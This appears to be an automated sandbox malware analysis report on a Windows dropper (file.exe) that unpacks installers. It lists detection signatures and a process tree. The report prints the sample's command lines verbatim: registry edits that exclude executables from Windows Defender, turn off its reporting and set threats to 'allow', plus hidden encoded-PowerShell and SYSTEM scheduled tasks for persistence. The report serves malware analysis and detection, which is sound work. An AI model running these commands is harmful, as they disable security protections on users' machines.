Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 753408
MD5: e99e15a440798e20c682eb859b3f7885
SHA1: b6f3b87894f51669dede0afe6cb4b504fe0ae614
SHA256: c3dd8a06d395f4772011ed42c0980a54b06915782a06873150462994ed92a712
Tags: exe

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Uses cmd line tools excessively to alter registry or file data
Encrypted powershell cmdline option found
Very long command line found
Suspicious powershell command line found
Performs DNS queries to domains with low reputation
Modifies Group Policy settings
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Creates job files (autostart)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Contains capabilities to detect virtual machines
Uses reg.exe to modify the Windows registry
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Classification

  • System is w10x64
  • file.exe (PID: 5428 cmdline: C:\Users\user\Desktop\file.exe MD5: E99E15A440798E20C682EB859B3F7885)
    • Install.exe (PID: 2620 cmdline: .\Install.exe MD5: 65D01849A2062434BCE6C580CDA92A1D)
      • Install.exe (PID: 3408 cmdline: .\Install.exe /S /site_id "525403" MD5: 893793FBD70BA4A92919D09205D6C9C1)
        • forfiles.exe (PID: 5112 cmdline: C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64& MD5: 4329CB18F8F74CC8DDE2C858BB80E5D8)
          • conhost.exe (PID: 5648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 5704 cmdline: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64& MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • reg.exe (PID: 5752 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
            • reg.exe (PID: 4644 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • forfiles.exe (PID: 5640 cmdline: C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64& MD5: 4329CB18F8F74CC8DDE2C858BB80E5D8)
          • conhost.exe (PID: 5624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 5696 cmdline: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64& MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • reg.exe (PID: 3128 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
              • Conhost.exe (PID: 5828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • reg.exe (PID: 1412 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • schtasks.exe (PID: 5792 cmdline: schtasks /CREATE /TN "gbyyEslRl" /SC once /ST 15:13:59 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==" MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 5804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 5992 cmdline: schtasks /run /I /tn "gbyyEslRl" MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 6040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 2068 cmdline: schtasks /DELETE /F /TN "gbyyEslRl" MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 4092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 1920 cmdline: schtasks /CREATE /TN "bbsSMGQQDZvgelOgpL" /SC once /ST 19:16:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe\" DC /site_id 525403 /S" /V1 /F MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 2072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • powershell.exe (PID: 6060 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA== MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • gpupdate.exe (PID: 2108 cmdline: "C:\Windows\system32\gpupdate.exe" /force MD5: 47C68FE26B0188CDD80F744F7405FF26)
      • conhost.exe (PID: 2356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • gpscript.exe (PID: 5816 cmdline: gpscript.exe /RefreshSystemParam MD5: C48CBDC676E442BAF58920C5B7E556DE)
  • pdyDoIJ.exe (PID: 2384 cmdline: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe DC /site_id 525403 /S MD5: 893793FBD70BA4A92919D09205D6C9C1)
    • powershell.exe (PID: 3560 cmdline: powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows 
Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;" MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 2080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 496 cmdline: "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32 MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • reg.exe (PID: 3520 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 2416 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 2064 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 4552 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5128 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5268 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5248 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5376 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5556 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5532 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5576 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
  • cleanup
No configs have been found
No yara matches

Persistence and Installation Behavior

Source: Process startedAuthor: Joe Security: Data: Command: schtasks /CREATE /TN "gbyyEslRl" /SC once /ST 15:13:59 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==", CommandLine: schtasks /CREATE /TN "gbyyEslRl" /SC once /ST 15:13:59 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==", CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: .\Install.exe /S /site_id "525403", ParentImage: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe, ParentProcessId: 3408, ParentProcessName: Install.exe, ProcessCommandLine: schtasks /CREATE /TN "gbyyEslRl" /SC once /ST 15:13:59 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==", ProcessId: 5792, ProcessName: schtasks.exe
No Snort rule has matched

AV Detection

Source: file.exe, ReversingLabs: Detection: 39%
Source: service-domain.xyz, Virustotal: Detection: 11%
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe, Avira: detection malicious, Label: HEUR/AGEN.1250601
Source: C:\Windows\Temp\aoRCsjFoxFbwPJxK\MeXzroudxpEgwUW\RFYnzaH.exe, Avira: detection malicious, Label: HEUR/AGEN.1250601
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe, Avira: detection malicious, Label: HEUR/AGEN.1250601
Source: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exe, ReversingLabs: Detection: 41%
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe, ReversingLabs: Detection: 51%
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe, ReversingLabs: Detection: 51%
Source: C:\Windows\Temp\aoRCsjFoxFbwPJxK\MeXzroudxpEgwUW\RFYnzaH.exe, ReversingLabs: Detection: 51%
Source: file.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe, Code function: 0_2_0040553A FindFirstFileA,0_2_0040553A
Source: C:\Users\user\Desktop\file.exe, Code function: 0_2_004055DE __EH_prolog,FindFirstFileW,AreFileApisANSI,FindFirstFileA,0_2_004055DE
Source: C:\Users\user\Desktop\file.exe, File opened: C:\Users\user\AppData\
Source: C:\Users\user\Desktop\file.exe, File opened: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\
Source: C:\Users\user\Desktop\file.exe, File opened: C:\Users\user\
Source: C:\Users\user\Desktop\file.exe, File opened: C:\Users\user\AppData\Local\
Source: C:\Users\user\Desktop\file.exe, File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Users\user\Desktop\file.exe, File opened: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\__data__\

Networking

Source: DNS query: service-domain.xyz
Source: powershell.exe, 00000011.00000002.412093333.000001A8F98D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.440371614.000000000287E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000011.00000002.403370580.000001A8F7925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micr
Source: powershell.exe, 00000011.00000002.331705203.000001A88156F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.306360805.000001A880270000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.394976607.000001A8901A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.390327444.000001A89006C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000011.00000002.305770495.000001A880203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.314741800.000001A880EC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000011.00000002.303899135.000001A880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.447061574.0000000002F01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000011.00000002.314741800.000001A880EC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000011.00000002.305770495.000001A880203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.314741800.000001A880EC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000011.00000002.390327444.000001A89006C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000011.00000002.390327444.000001A89006C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000011.00000002.390327444.000001A89006C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000011.00000002.305770495.000001A880203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.314741800.000001A880EC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000011.00000002.413168251.000001A8F993B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
Source: powershell.exe, 00000011.00000002.331705203.000001A88156F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.306360805.000001A880270000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.394976607.000001A8901A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.390327444.000001A89006C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000011.00000002.314741800.000001A880EC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000011.00000002.314741800.000001A880EC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
Source: powershell.exe, 00000011.00000002.314741800.000001A880EC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgformat.ps1xmlagement.dll2040.missionsand
Source: unknown, DNS traffic detected: queries for: service-domain.xyz

System Summary

Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe, Process created: Commandline size = 3260
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe, File deleted: C:\Windows\SysWOW64\GroupPolicykaNvH
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe, File created: C:\Windows\system32\GroupPolicy\gpt.ini
Source: C:\Users\user\Desktop\file.exe, Code function: String function: 00403A9C appears 33 times
Source: C:\Users\user\Desktop\file.exe, Code function: String function: 00413954 appears 179 times
Source: file.exe, 00000000.00000000.246681681.0000000000427000.00000002.00000001.01000000.00000003.sdmp, Binary or memory string: OriginalFilename7zS.sfx.exe, vs file.exe
Source: file.exe, Binary or memory string: OriginalFilename7zS.sfx.exe, vs file.exe
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
Source: Joe Sandbox View, Dropped File: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exe 8B691E37EECDDAACD1BB83067CE261157895DEC8302E558C5C9D159C117151A4
Source: Joe Sandbox View, Dropped File: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe A240FDA428ECCA831C7730C83F40BE6F43BB8370F33D8D66D4844B734011C57B
Source: Joe Sandbox View, Dropped File: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe A240FDA428ECCA831C7730C83F40BE6F43BB8370F33D8D66D4844B734011C57B
Source: C:\Users\user\Desktop\file.exe, File read: C:\Users\user\Desktop\file.exe
Source: file.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\file.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exe .\Install.exe
Source: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe .\Install.exe /S /site_id "525403"
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&
Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&
Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
